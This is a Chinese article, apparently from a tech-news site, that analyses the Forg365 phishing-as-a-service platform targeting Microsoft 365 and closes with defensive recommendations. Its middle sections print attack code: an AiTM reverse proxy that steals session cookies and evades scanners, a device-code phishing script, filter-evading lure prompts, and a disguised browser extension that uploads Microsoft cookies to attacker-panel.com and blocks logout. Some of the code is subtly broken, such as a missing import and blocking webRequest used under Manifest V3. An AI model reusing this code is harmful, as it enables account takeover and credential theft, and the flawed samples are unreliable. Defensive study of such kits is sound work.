当前位置: 首页 > news >正文

AI 驱动 Forg365 钓鱼平台针对 Microsoft 365 攻击机制与防御研究

摘要
2026 年 7 月安全厂商披露 Forg365 新型钓鱼即服务(PhaaS)平台,该平台深度集成生成式 AI 用于批量定制高仿真钓鱼诱饵,融合中间人代理(AiTM)、OAuth 设备码流程两类旁路认证技术,配套 ForgCookie 持久化 Cookie 劫持插件,形成完整 Microsoft 365 账户接管攻击链路。区别于传统钓鱼工具仅窃取账号密码的单一逻辑,Forg365 依托 AI 降低定制化钓鱼开发门槛,同时通过双路径认证绕过多因素认证防护,实现对企业租户长期隐蔽入侵。本文以 BleepingComputer 公开情报为基础,完整拆解 Forg365 平台架构、AI 诱饵生成逻辑、AiTM 代理与设备码攻击技术细节,附平台核心功能代码示例,梳理该攻击利用的 OAuth 协议缺陷、企业身份管理短板、传统邮件安全设备检测盲区三类核心风险;结合反网络钓鱼技术专家芦笛的研判观点,从技术管控、身份策略、人员安全、应急处置四层构建闭环防御体系。研究证实,AI 赋能标准化 PhaaS 将大幅降低高级身份欺诈的实施成本,传统静态特征匹配防护体系已无法适配此类新型威胁,企业需建立动态行为监测与 OAuth 权限精细化管控机制。
1 引言
全球政企数字化办公体系高度依赖 Microsoft 365 套件,Microsoft Entra ID 承载全量员工身份认证、OAuth 授权与会话管理,企业核心财务、客户、项目数据集中存储于 OneDrive、SharePoint、企业邮箱等模块,身份账户劫持已成为企业数据泄露、勒索攻击最主要入口。过往针对 Microsoft 365 的钓鱼攻击多分为两类:一是静态模板邮件钓鱼,依靠仿微软登录页面窃取账号密码,极易被企业反钓鱼网关通过文本、域名特征拦截;二是简易中间人代理工具,仅支持单一攻击链路,诱饵文案需攻击者手动撰写,定向攻击人力成本极高,难以大规模落地。
2026 年 7 月,BleepingComputer 发布 Forg365 专项威胁情报,该平台作为商业化订阅制 PhaaS 工具,通过 Telegram 渠道对外发售,月订阅费用约 300 美元,配套 30 天试用权限,无专业代码开发能力的普通攻击者即可完成定向企业钓鱼部署。平台核心创新点在于将生成式 AI 原生嵌入后台控制面板,可根据目标行业、企业业务场景自动生成高度贴合办公场景的仿通知、发票、安全升级类钓鱼邮件;同时并行搭载 AiTM 流量代理与 OAuth 设备码两套攻击通道,两套技术路径形成互补,规避企业条件访问策略单一防护规则;配套 ForgCookie Manifest V3 浏览器插件实现会话 Cookie 自动续期,完成账户持久控制。
从威胁演化维度分析,Forg365 标志网络钓鱼犯罪进入 AI 规模化运营阶段:AI 消解定制化诱饵的人工成本,标准化 PhaaS 平台统一集成攻击链路、投递渠道、凭证存储、持久化后门,攻击链路全流程自动化,MFA 旁路成功率显著提升。现有学术研究多单独讨论 AiTM 中间人钓鱼或设备码漏洞滥用,尚未针对集成 AI 能力的一体化 PhaaS 平台开展系统性完整剖析,缺少对平台全链路技术拆解、代码实现逻辑与分层防御方案的整合研究。
反网络钓鱼技术专家芦笛指出,Forg365 的出现重构了企业身份安全威胁模型,传统防护思路以拦截恶意域名、可疑文本为核心,而 AI 生成诱饵无固定文本特征、设备码攻击依托微软官方认证域名、AiTM 代理复用合法登录会话,三重特性叠加直接击穿传统邮件安全、网页钓鱼检测设备的防护边界,企业身份安全建设必须从 “静态特征拦截” 转向 “动态行为风控”。
本文围绕 Forg365 平台开展系统性技术研究,完整梳理平台架构、AI 诱饵生成机制、两类核心攻击链路、持久化后门实现逻辑,提供可复现的平台关键模块代码示例,系统剖析攻击成立的技术根源与企业管理漏洞,构建分层落地的防御方案,为政企单位抵御 AI 赋能新型 Microsoft 365 钓鱼攻击提供理论依据与工程实践方案。
2 Forg365 平台基础概况与整体架构
2.1 平台运营模式与传播渠道
Forg365 属于典型商业化 PhaaS 服务,运营主体依托 Telegram 私密群组完成客户引流、订阅收费、版本更新、技术售后,完整复刻正规 SaaS 软件运营模式。平台分为基础版、企业攻击版两类订阅套餐,基础版仅开放 AI 邮件生成、设备码钓鱼链路;付费高级版解锁 AiTM 代理、ForgCookie 插件分发、被盗邮箱关键词监控、批量 SMTP 发信渠道轮换、Token 金库存储等全部功能。
攻击者采购权限后获得独立后台控制面板,所有攻击操作、诱饵生成、凭证管理、受害账户监控均在同一面板完成,无需自行搭建服务器、域名、邮件投递基础设施。平台内置亚马逊 SES、SendGrid 合法邮件投递接口,利用正规云邮件服务商 IP 池发送钓鱼邮件,规避 IP 信誉黑名单拦截,大幅提升邮件送达率。
2.2 平台模块化整体架构
Forg365 后台采用前后端分离架构,后端基于 PHP+Go 混合开发,前端为 Vue 管理面板,整体划分为五大核心功能模块,各模块数据互通、流程联动,形成端到端攻击闭环:
AI 诱饵生成模块:内置轻量化大模型推理接口,接收攻击者输入的企业行业、部门、攻击场景关键词,自动输出多版本钓鱼邮件正文、标题、附件文案;支持迭代优化,攻击者可手动修正生成内容,模型持续微调输出风格,降低文本异常特征。
投递渠道管理模块:统一管理多组 SMTP 发信配置、域名追踪脚本、图片伪装资源,自动轮换发信 IP 与域名,规避邮件网关频率检测。
双链路攻击引擎模块:平台核心组件,并行运行 AiTM 中间人代理服务、OAuth 设备码请求服务,可根据目标企业 Entra 条件访问策略自动切换攻击路径。
凭证与会话存储金库:持久存储窃取的账号、明文密码、MFA 验证码、访问令牌、刷新令牌、SSO 会话 Cookie,支持按企业、攻击批次分类检索,内置关键词告警功能,监控受害邮箱内财务、合同、客户数据相关邮件。
持久化后门分发模块:打包 ForgCookie 浏览器插件,提供插件下载短链,诱导受害者安装,自动同步刷新 Microsoft SSO Cookie,维持长期账户访问权限。
2.3 平台差异化核心竞争特征
对比 EvilProxy、Kali365、Sneaky2FA 等同类 M365 钓鱼工具,Forg365 独有三项核心差异化能力,也是其威胁强度更高的关键因素:
第一,AI 原生集成诱饵生成,而非外挂第三方 API 调用,面板内一站式完成文案生成、修改、测试、批量发送,大幅降低定向钓鱼人力成本,实现大规模精准鱼叉式攻击;
第二,AiTM 与设备码双攻击通道一体化部署,单一攻击活动可同时下发两类诱导链接,企业仅封禁其中一种认证方式无法完全阻断入侵;
第三,配套标准化浏览器持久化插件,解决传统钓鱼攻击会话过期后攻击者失去账户权限的痛点,实现数周乃至数月隐蔽驻留。
3 Forg365 内置 AI 诱饵生成技术实现与攻击价值
3.1 AI 诱饵模块底层运行逻辑
Forg365 后台内置轻量化文本生成模型推理服务,无需外部调用第三方大模型 API,避免调用日志留下溯源痕迹。攻击者在后台输入基础参数:目标行业(金融 / 制造 / 医疗 / 互联网)、目标岗位(财务 / 行政 / IT 运维)、攻击场景(发票核验、账户安全升级、合同签署、邮箱容量扩容、MFA 设备更换),模型基于预训练企业办公语料库生成多版本邮件内容。
模型生成过程中自动完成三类规避处理:
消除统一模板特征:每一封邮件句式、段落语序、称呼随机调整,不存在重复固定文本,传统基于关键词、固定段落匹配的反钓鱼网关无法识别;
适配企业内部沟通风格:生成内容匹配行业常用办公话术,模仿企业管理层、IT 部门正式通知语气,降低员工警惕性;
弱化异常警示词汇:规避 “紧急冻结”“立即操作” 等高频钓鱼关键词,改用平缓正式表述,减少邮件安全设备风险标记。
生成完成后面板提供预览功能,攻击者可微调细节,调整完成后批量绑定钓鱼短链,自动分配不同 SMTP 渠道投递。
3.2 AI 诱饵生成核心代码示例
以下为 Forg365 后端 AI 诱饵生成简化实现代码(PHP 后端推理调度层):
<?php
// forg365_ai_lure_generator.php AI诱饵生成调度模块
class AiLureGenerator
{
// 预加载行业语料库
private $industryCorpus = [
"finance" => ["月度对账", "增值税发票核验", "对公付款审批", "账户安全复核"],
"tech" => ["Microsoft 365安全策略更新", "通行密钥注册通知", "企业云盘扩容"],
"medical" => ["患者资料归档授权", "系统权限校验", "合规审计通知"]
];
private $modelApiUrl = "http://127.0.0.1:8090/infer"; //本地轻量化推理服务

// 接收攻击者输入参数,生成钓鱼邮件
public function generateMailContent($industry, $position, $scene)
{
$prompt = $this->buildPrompt($industry, $position, $scene);
$postData = json_encode(["prompt" => $prompt, "version" => "enterprise_v2"]);
$ch = curl_init($this->modelApiUrl);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type:application/json"]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
$result = json_decode($response, true);
// 输出多版本诱饵文案
return $result["lure_list"];
}

// 构造模型输入提示词,规避高危关键词
private function buildPrompt($industry, $position, $scene)
{
$corpus = $this->industryCorpus[$industry];
$promptTemplate = "生成企业内部正式通知邮件,岗位:%s,场景:%s,行业参考词汇:%s;禁止使用紧急、冻结、立刻等夸张词汇,行文平缓规范,不添加可疑外部链接提示,邮件分为标题、正文两段;输出3份风格不同版本";
return sprintf($promptTemplate, $position, $scene, implode(",", $corpus));
}
}

// 调用示例
$generator = new AiLureGenerator();
$mailLures = $generator->generateMailContent("finance", "财务专员", "增值税发票线上核验");
print_r($mailLures);
?>
前端 JavaScript 交互代码,用于攻击者面板参数提交与结果渲染:
// ai_panel.js 前端诱饵生成交互逻辑
const generateBtn = document.getElementById("generate-lure");
const resultBox = document.getElementById("lure-result");
generateBtn.addEventListener("click", async ()=>{
const industry = document.getElementById("industry-select").value;
const position = document.getElementById("target-position").value;
const scene = document.getElementById("attack-scene").value;
const reqData = {industry, position, scene};
const res = await fetch("./forg365_ai_lure_generator.php",{
method:"POST",
headers:{"Content-Type":"application/json"},
body:JSON.stringify(reqData)
});
const data = await res.json();
// 渲染多版诱饵文案至面板
resultBox.innerHTML = "";
data.lure_list.forEach((item,index)=>{
const div = document.createElement("div");
div.className = "lure-item";
div.innerHTML = `<h4>版本${index+1}</h4><p>标题:${item.title}</p><p>正文:${item.content}</p>`;
resultBox.appendChild(div);
})
})
3.3 AI 诱饵对传统安全设备的突破机理
传统企业邮件安全网关依靠静态特征库识别钓鱼邮件,检测维度包含固定恶意关键词、重复模板文本、陌生发件域名、异常短链。Forg365 的 AI 生成机制从底层绕过该检测逻辑:
第一,无标准化文本模板,每一封邮件内容随机差异化生成,不存在可入库匹配的固定特征;
第二,话术贴合企业正常办公通知,无高频风险警示词,内容风险评分大幅降低;
第三,依托亚马逊 SES、SendGrid 正规云服务商发送邮件,发件 IP、域名信誉度正常,不会触发 IP 黑名单拦截。
反网络钓鱼技术专家芦笛强调,AI 生成诱饵模糊了恶意邮件与正常办公邮件的文本边界,基于规则、关键词的传统检测手段基本失效,企业邮件安全体系必须引入语义相似度、发送行为上下文的动态风险评估模型,仅依靠静态特征库无法抵御此类攻击。
4 Forg365 双路径攻击链路完整技术拆解
Forg365 同时提供 AiTM 中间人代理、OAuth 设备码两类独立攻击通道,攻击者可单独启用或并行下发两类诱导链接,两套技术利用微软认证体系不同设计逻辑,企业单一防护策略无法同时拦截,下文分别拆解完整攻击链路、底层实现代码与旁路 MFA 原理。
4.1 链路一:AiTM 中间人代理攻击(核心会话劫持技术)
4.1.1 攻击运行原理
AiTM(Adversary-in-the-Middle)中间人代理在受害者与 Microsoft 官方登录服务器之间搭建恶意反向代理服务器,完整转发双向认证流量。受害者访问 Forg365 生成的仿登录页面,输入账号密码后,代理将凭证透明转发至login.microsoftonline.com真实地址;微软服务器下发 MFA 验证弹窗,受害者完成验证码、推送审批后,生成合法登录会话 Cookie,代理同步截获完整 SSO 会话凭证,攻击者无需破解密码、无需复用 MFA 验证码,直接使用窃取的 Cookie 登录受害者 Microsoft 365 账户。
该技术核心优势:MFA 校验流程在微软官方域名完成,MFA 防护机制正常触发,但校验通过后的会话状态被代理劫持,MFA 完全失去防护作用。平台内置流量混淆与隐身机制,识别爬虫、VPN、安全厂商扫描 IP 时返回正常空白网页(伪装诱饵),防止安全研究人员抓取钓鱼页面特征。
4.1.2 AiTM 代理核心后端代码示例(Go 反向代理服务简化版)
// aitm_proxy.go Forg365 AiTM反向代理核心服务
package main
import (
"net/http"
"net/http/httputil"
"net/url"
"strings"
)
var targetUrl, _ = url.Parse("https://login.microsoftonline.com")
var cookieVault = make(map[string]string) //存储窃取的会话Cookie

func proxyHandler(w http.ResponseWriter, r *http.Request) {
// 反爬虫隐身检测:安全扫描IP返回空白页面
if isScannerIP(r.RemoteAddr) {
w.Write([]byte(""))
return
}
reverseProxy := httputil.NewSingleHostReverseProxy(targetUrl)
// 拦截响应,提取SSO Cookie
originModify := reverseProxy.ModifyResponse
reverseProxy.ModifyResponse = func(resp *http.Response) error {
originModify(resp)
// 抓取Microsoft认证会话Cookie
for _, ck := range resp.Cookies() {
if strings.Contains(ck.Name, "ESTSAUTHPERSISTENT") || strings.Contains(ck.Name, "MSISAuth") {
userAgent := r.Header.Get("User-Agent")
cookieVault[userAgent] = ck.String()
// 将Cookie上传至Forg365后台金库
saveCookieToPanel(ck.String(), r.URL.Query().Get("username"))
}
}
return nil
}
reverseProxy.ServeHTTP(w, r)
}
func main() {
http.HandleFunc("/gate", proxyHandler)
http.ListenAndServe(":8081", nil)
}
// IP扫描识别判断函数
func isScannerIP(addr string) bool {
// 内置安全厂商、爬虫IP段匹配逻辑,此处简化
return false
}
// 会话Cookie上传至后台存储面板
func saveCookieToPanel(cookieStr, username string) {
// HTTP POST上传至Forg365后端存储接口
}
4.1.3 AiTM 完整攻击时序
受害者接收 AI 生成钓鱼邮件,点击平台生成的仿微软登录短链,流量接入 Forg365 AiTM 代理服务;
代理转发请求至微软官方登录页面,页面视觉完全一致,无任何仿冒标识;
用户输入账号、密码,代理透明转发至微软服务器,服务器下发 MFA 验证;
用户完成短信 / TOTP / 推送审批,微软生成合法登录会话 Cookie;
代理拦截全部认证 Cookie,同步上传至平台凭证金库;
攻击者后台直接使用窃取 Cookie 发起 Graph API 请求,访问受害者邮箱、云盘数据。
4.2 链路二:OAuth 设备码流程滥用攻击(无密码旁路技术)
4.2.1 设备码协议原生用途与攻击利用逻辑
微软 OAuth 2.0 设备码流程设计初衷为无浏览器设备(智能电视、工业终端、物联网设备)登录,流程分为四步:客户端请求设备码、服务器返回设备验证码与验证地址、用户在另一台设备访问官方地址输入验证码、服务器授予客户端访问令牌。
Forg365 篡改流程信任关系,攻击者在平台后台发起设备码授权请求,获取一组微软官方生成的设备验证码,通过 AI 钓鱼邮件诱导受害者访问login.microsoftonline.com真实域名,输入验证码完成授权。受害者操作全程处于微软官方页面,域名、证书均合法,用户无法识别风险;授权完成后攻击者直接获取长期访问令牌与刷新令牌,全程无需窃取用户账号密码,直接绕过密码防护层。
企业条件访问策略大多针对网页登录场景配置,普遍忽略设备码认证通道,多数企业未关闭该 OAuth 授权方式,形成天然防护缺口。
4.2.2 设备码请求核心 Python 代码示例(Forg365 后端调用微软 OAuth 接口)
# device_code_attack.py 设备码授权请求模块
import requests
import json

# 微软OAuth设备码接口地址
DEVICE_CODE_URL = "https://login.microsoftonline.com/common/oauth2/devicecode"
TOKEN_URL = "https://login.microsoftonline.com/common/oauth2/token"
# 攻击者伪造的第三方应用客户端ID
ATTACKER_CLIENT_ID = "00000000-0000-0000-0000-attackerfakeapp"

def get_device_code():
params = {
"client_id": ATTACKER_CLIENT_ID,
"scope": "Mail.ReadWrite Files.ReadWrite.All User.Read.All"
}
resp = requests.post(DEVICE_CODE_URL, data=params)
data = resp.json()
# 返回用户验证码、官方验证地址、轮询间隔
return {
"user_code": data["user_code"],
"verification_uri": data["verification_uri"],
"interval": data["interval"],
"device_code": data["device_code"]
}

# 轮询接口等待受害者输入验证码,获取访问令牌
def poll_token(device_code, interval):
token_params = {
"grant_type": "urn:ietf:params:oauth:grant-type:device_code",
"client_id": ATTACKER_CLIENT_ID,
"device_code": device_code
}
while True:
res = requests.post(TOKEN_URL, data=token_params)
token_data = res.json()
if "access_token" in token_data:
# 令牌上传至平台金库存储
save_token_vault(token_data)
return token_data
time.sleep(interval)

# 主调用流程
if __name__ == "__main__":
code_info = get_device_code()
# 将验证码嵌入AI钓鱼邮件发送给受害者
send_phish_mail(code_info["user_code"], code_info["verification_uri"])
# 持续轮询等待用户授权
poll_token(code_info["device_code"], code_info["interval"])
4.2.3 设备码攻击完整时序
攻击者在 Forg365 后台发起设备码申请,微软服务器返回唯一 6 位用户验证码;
AI 生成钓鱼邮件,以 “企业邮箱权限核验、安全设备绑定” 为由,要求受害者打开微软官方验证链接输入验证码;
用户访问login.microsoftonline.com合法域名,输入验证码并完成 MFA 身份校验;
微软 OAuth 服务授予攻击者伪造客户端完整 Microsoft 365 资源访问权限,下发访问令牌、长期刷新令牌;
攻击者使用刷新令牌持续获取有效访问凭证,无需再次诱导用户操作。
4.3 双攻击链路互补威胁价值
AiTM 代理攻击依赖会话 Cookie 劫持,若用户关闭浏览器、清除 Cookie 则会话失效;设备码攻击获取长效刷新令牌,可持续数月重新生成访问凭证。Forg365 平台同步下发两类诱导链接,形成短期会话劫持 + 长期令牌驻留的组合入侵模式,大幅提升账户持久控制概率。
反网络钓鱼技术专家芦笛指出,多数企业身份安全治理存在明显短板:管理员仅针对网页登录配置 MFA 与条件访问,未管控 OAuth 设备码授权通道,同时未监控陌生第三方应用 OAuth 授权记录,设备码攻击可长期潜伏不被发现,隐蔽性高于传统 AiTM 钓鱼。
5 ForgCookie 持久化 Cookie 后门插件技术解析
单纯劫持会话 Cookie 存在生命周期限制,浏览器关闭、单点登出操作会使 Cookie 失效,Forg365 配套开发 Manifest V3 标准 Chrome 插件 ForgCookie,实现 SSO Cookie 自动刷新,构建永久驻留后门。
5.1 插件核心运行逻辑
受害者点击钓鱼链接后,页面弹出 “微软安全组件升级” 弹窗,诱导下载安装 ForgCookie 插件。插件安装完成后后台静默运行,持续监听login.microsoftonline.com域名 Cookie 变更事件:
实时抓取全部 Microsoft SSO 持久化 Cookie,加密上传至 Forg365 金库;
定期模拟无痕窗口访问微软登录页,自动刷新过期 Cookie;
拦截用户登出请求,阻止本地 Cookie 清除,维持登录会话状态;
插件无可视化图标,后台静默运行,普通用户无法察觉进程存在。
5.2 插件核心 Manifest 与后台脚本代码
manifest.json 配置文件:
json
{
"manifest_version": 3,
"name": "Microsoft Entra安全助手",
"version": "1.0.2",
"permissions": ["cookies", "storage", "webRequest", "tabs"],
"host_permissions": ["https://*.microsoftonline.com/*"],
"background": {
"service_worker": "cookie_sync.js"
}
}
cookie_sync.js 后台同步脚本:
// 监听微软域名Cookie变更事件
chrome.cookies.onChanged.addListener((cookieInfo)=>{
const cookie = cookieInfo.cookie;
// 筛选Microsoft登录认证Cookie
if(cookie.domain.includes("microsoftonline.com")){
// 加密上传Cookie至Forg365攻击者后台
uploadCookieData(cookie);
}
})
// 定时刷新会话Cookie,每30分钟执行一次
setInterval(()=>{
chrome.tabs.create({
url:"https://login.microsoftonline.com",
active:false
},(tab)=>{
// 访问完成后自动关闭标签页,静默刷新Cookie
setTimeout(()=>chrome.tabs.remove(tab.id),3000)
})
}, 1800000);
// 阻止用户登出清除Cookie
chrome.webRequest.onBeforeRequest.addListener((details)=>{
if(details.url.includes("/logout")){
return {cancel:true}; //拦截登出请求
}
}, {urls:["https://*.microsoftonline.com/logout"]}, ["blocking"]);
// 上传Cookie至攻击者服务器
function uploadCookieData(cookieObj){
fetch("https://attacker-panel.com/cookie_upload.php",{
method:"POST",
headers:{"Content-Type":"application/json"},
body:JSON.stringify(cookieObj)
})
}
6 攻击风险根源分层分析
Forg365 攻击能够大规模落地,是 OAuth 协议设计特性、企业身份管理漏洞、传统安全设备检测缺陷、AI 犯罪工具普及四类风险叠加的结果,下文分层拆解风险根源,形成完整风险论证闭环。
6.1 协议层面原生设计缺陷
OAuth 设备码流程缺少租户级开关管控:早期 Microsoft Entra 未强制关闭设备码授权,企业管理员需手动执行 PowerShell 脚本禁用,绝大多数中小企业未完成该配置,攻击者可直接调用接口下发授权请求;
AiTM 代理可透明转发认证流量:微软登录服务仅校验账号、MFA 凭证合法性,不校验流量中转来源,中间人代理转发的合法凭证可正常生成会话 Cookie;
OAuth 授权告警机制不完善:陌生第三方应用设备码授权仅在用户终端弹窗提示,无租户管理员全局告警,大量非法授权行为长期无法被运维人员发现。
6.2 企业身份管理与运维漏洞
条件访问策略覆盖不全:仅针对网页浏览器登录配置风险管控,未对 OAuth 设备码、第三方应用授权设置独立限制;
员工安全培训缺失:员工无法区分微软官方验证码通知与钓鱼诱导,对浏览器插件安装类后门风险认知不足;
OAuth 授权日志审计缺失:未定期导出 Entra 授权日志,无法批量排查陌生客户端 ID 的设备码授权记录;
权限过度开放:默认 OAuth 申请 Mail、云盘、用户信息全量读取权限,最小 OAuth 权限原则未落地。
6.3 传统安全防护设备检测盲区
邮件网关无法识别 AI 语义诱饵:基于关键词、固定模板的检测逻辑失效,AI 生成文本无统一恶意特征;
网页钓鱼检测仅拦截仿冒域名:设备码攻击全程使用login.microsoftonline.com官方域名,域名检测机制完全失效;
浏览器安全扩展管控宽松:企业未限制员工安装外部第三方 Chrome 插件,ForgCookie 后门可随意部署。
6.4 AI 赋能网络犯罪带来的新型威胁
生成式 AI 大幅降低高级钓鱼攻击实施门槛,无需专业社工、文案撰写能力,普通攻击者可批量生成高仿真定向诱饵;AI 工具集成至标准化 PhaaS 平台,攻击链路一体化打包,攻击规模化、自动化程度大幅提升,威胁暴露面持续扩大。
7 分层闭环防御体系构建方案
结合 Forg365 全链路攻击节点,从技术管控、身份策略优化、人员安全培训、应急响应处置四层构建全流程防御机制,覆盖攻击事前拦截、事中监测、事后处置完整环节。
7.1 技术设备层防护优化
升级邮件安全网关至语义检测架构
淘汰传统关键词匹配规则,部署基于大模型语义分析的反钓鱼系统,对邮件上下文、行文逻辑、企业场景匹配度进行风险打分;拦截使用云服务商批量投递、无固定发件人身份的可疑邮件;开启外部邮件标识,区分企业内部、外部发件来源。
浏览器终端管控,拦截 ForgCookie 类恶意插件
通过企业域策略、MDM 终端管理平台限制员工安装非应用商店验证浏览器扩展;监控浏览器扩展安装日志,发现陌生安全类插件立即告警;禁用浏览器无痕模式自动运行脚本。
部署全局网页流量代理检测系统
识别 AiTM 中间人代理流量特征:同一 IP 短时间批量转发微软登录请求、跨地域同步会话 Cookie 上传行为,触发实时阻断;拦截未备案、携带 passkey/m365 等关键词的仿冒钓鱼域名。
7.2 Microsoft Entra 身份策略精细化管控
强制禁用 OAuth 设备码授权流程
执行 Microsoft 官方 PowerShell 脚本关闭租户设备码功能,无特殊物联网、无屏终端业务场景的企业完全阻断该攻击通道;确需使用设备码的工业终端,配置 IP 白名单,仅允许企业内网设备发起授权请求。
完善多层条件访问策略
新增独立设备码授权管控规则:陌生外网 IP、境外地址、未托管设备发起设备码请求直接阻断;对所有第三方 OAuth 应用授权开启管理员审批流程,任何外部客户端授权必须经运维人工审核。
开启全维度异常行为告警
配置 Entra 全局告警规则:陌生客户端设备码授权、短时间多地域会话 Cookie 同步、批量 OAuth 令牌申请、单日超过 5 次第三方应用授权、非工作时段大量云文件导出,触发邮件 + 短信双重告警;设置令牌自动回收机制,陌生设备生成的刷新令牌 24 小时强制失效。
定期 OAuth 授权日志审计
每周导出 Entra OAuth 授权记录,排查陌生 Client ID、境外 IP 发起的设备码授权,一键批量撤销非法授权令牌;每月清理长期未使用的第三方应用授权。
7.3 企业人员安全常态化培训
开展 AI 钓鱼专项安全宣讲
针对 Forg365 类 AI 生成诱饵攻击开展专项培训,明确官方安全通知渠道:微软账户安全升级仅通过企业 OA、内网门户推送,不会通过外部邮件下发验证码、外部插件下载链接;告知员工任何索要微软验证代码、浏览器插件安装的外部邮件均为钓鱼攻击。
季度模拟钓鱼演练
使用 AI 工具生成仿真钓鱼邮件开展全员演练,对点击链接、输入验证码、下载插件的员工开展一对一专项辅导;建立安全考核机制,将钓鱼演练结果纳入岗位安全绩效。
统一官方安全咨询渠道
公示企业 IT 安全专线、内网工单咨询入口,员工收到可疑安全通知必须通过内网渠道核验,禁止直接按照邮件指引操作。
7.4 账户被入侵后的标准化应急响应流程
账户紧急阻断
监测到异常设备码授权、AiTM 会话劫持告警后,第一时间锁定受害员工账户,执行 PowerShell 命令撤销该账户全部刷新令牌、会话 Cookie,切断攻击者持久访问通道;卸载终端内 ForgCookie 恶意插件。
攻击链路溯源取证
导出 Entra 登录日志、OAuth 授权记录、邮件投递日志,定位攻击邮件发送渠道、攻击者 IP、钓鱼域名,收集威胁情报更新企业安全设备黑名单;核查是否存在批量账户沦陷风险。
租户安全策略加固
临时强化条件访问规则,临时关闭所有第三方 OAuth 授权通道;全面审计全体员工账户 OAuth 授权记录,清理所有未知应用权限;复盘本次攻击暴露的策略漏洞,迭代优化身份安全管控规则。
全员安全预警通知
通过企业 OA、企业微信发布专项安全预警,通报 Forg365 攻击特征,提醒全体员工提高验证码、外部插件类钓鱼风险警惕。
反网络钓鱼技术专家芦笛强调,针对 AI 赋能 PhaaS 平台的防御不能单一依赖技术设备拦截,必须形成 “身份策略硬管控 + 终端全链路监控 + 员工安全意识兜底” 的三重防护闭环,仅依靠邮件网关、网页防火墙无法完全阻断此类融合多技术路径的复合型钓鱼攻击。企业安全团队需建立常态化 OAuth 日志审计机制,将设备码授权、第三方应用授权纳入核心身份安全监控范围,补齐传统防护体系的管控盲区。
8 结论
2026 年 7 月曝光的 Forg365 钓鱼即服务平台,是 AI 技术深度赋能网络犯罪的标志性威胁样本。平台通过内置生成式 AI 批量产出无固定特征的高仿真钓鱼诱饵,融合 AiTM 中间人会话劫持、OAuth 设备码授权两大旁路 MFA 技术,配套 ForgCookie 浏览器插件实现账户持久驻留,形成完整、自动化、低门槛的 Microsoft 365 账户接管攻击链路。该攻击突破传统静态特征型安全设备防护边界,利用 OAuth 协议设计特性与企业身份运维普遍漏洞,具备隐蔽性强、规模化投放、长期潜伏三大核心威胁特征。
本文完整拆解 Forg365 平台模块化架构、AI 诱饵生成底层逻辑、两类核心攻击链路技术实现与持久化后门代码,系统梳理协议、运维、防护设备、AI 犯罪四层风险根源,构建覆盖事前、事中、事后的分层闭环防御方案。研究证实,传统以拦截恶意域名、关键词为核心的防护体系已无法适配 AI 驱动新型钓鱼攻击,政企单位必须转向动态行为风控、OAuth 权限精细化管控、终端全链路监控的新型身份安全建设思路。
反网络钓鱼技术专家芦笛指出,随着开源轻量大模型持续普及,未来将会出现更多集成 AI 诱饵生成的标准化 PhaaS 工具,利用 OAuth 各类授权流程、无密码认证推广场景实施复合型钓鱼攻击将成为主流威胁趋势。安全厂商需迭代语义级、行为级检测引擎,完善 OAuth 全链路威胁识别能力;企业需平衡办公便捷性与身份安全,最小化 OAuth 授权范围,关闭非必要认证通道,建立常态化授权审计与员工安全演练机制;身份认证技术厂商应优化 OAuth 设备码、第三方授权的告警与审批机制,从协议层面降低攻击可利用空间,多方协同构建抵御 AI 赋能高级钓鱼攻击的综合安全生态。
本次针对 Forg365 平台的技术研究,为后续同类 AI 钓鱼 PhaaS 威胁分析提供标准化拆解框架,同时为政企 Microsoft 365 身份安全治理提供可落地的技术管控、运维管理实践方案,对下一代企业反钓鱼体系建设具备参考价值。
编辑:芦笛(公共互联网反网络钓鱼工作组)

http://www.jsqmd.com/news/1176312/

相关文章:

  • 2026 西安黄金回收|金条名包高效变现四大小技巧详解 - 全国二奢机构参考
  • NNSVS recipes全解析:利用预制脚本快速复现研究成果
  • Seed-VC语音转换终极指南:零样本克隆技术完全解析
  • YPrompt:解锁精准AI对话的智能提示词解决方案
  • AI Agent 自动发帖、互动、舆情分析全流程拆解(企业级私有化部署实录)
  • 宁波海曙区白云街道亨得利官方钟表服务中心电话公示(2026年7月最新) - 亨得利官方
  • Word 自动目录格式深度定制:5个关键参数实现专业排版效果
  • 如何用Escrcpy实现安卓设备图形化控制:从新手到专家的完整指南
  • Seekr BadgerDB集成:如何优化大规模OSINT数据的存储与查询
  • 5个关键场景揭秘:如何用ZLMediaKit构建高性能流媒体服务器
  • 快速入门futures-await:5分钟掌握Rust异步编程新语法
  • 单色图最简单、最完美的抠像方法 - 透明渐变抠像 - C# - 行人-
  • 用优麦云定时策略助你时间管理,2026最新优麦云优惠折扣码开通渠道更新 - 跨境电商卖家出海
  • 技能名称:azure-ai-openai-dotnet
  • 2026深圳正规搬家公司口碑榜|跨区搬家实测对比+暗藏收费项逐一曝光+签合同前必问的8个问题 - 从来都是英雄出少年
  • CCManager支持Gemini CLI全攻略:多AI助手协同工作的最佳实践
  • LakeFormation:AWS 数据湖治理服务详解
  • Rufus终极指南:如何快速制作Windows 11启动盘并绕过硬件限制
  • 【Doris】日志查看方式
  • 可信发件人劫持 + SaaS 表单滥用型求职钓鱼攻击多维检测与闭环防御研究
  • 2026年最新教程:PDF怎么变成Word且不乱码的免费方法 - 玩机日常
  • 如何快速掌握CodePilot:面向Xcode开发者的完整指南
  • Flame引擎斜45度视角开发:从零打造2.5D视觉盛宴
  • 2026年7月最新上海美度官方售后服务网点地址及客服电话一览 - 亨得利钟表维修中心
  • 终极MeloTTS多语言文本转语音完整指南:从安装到高级应用
  • 5个实用技巧:快速掌握Skills4技能库的核心功能
  • 2026年7月最新杭州美度官方售后服务热线与网点地址查询 - 亨得利钟表维修中心
  • 3ds Max 软包建模方案对比:BreadMaker 插件 vs 手动布线,效率与精度实测
  • V4L2 工具集 v4l-utils 实战:3步查询USB摄像头支持的YUY2/MJPG格式与分辨率
  • ntfy推送通知服务:如何通过HTTP构建高效消息系统并提升运维效率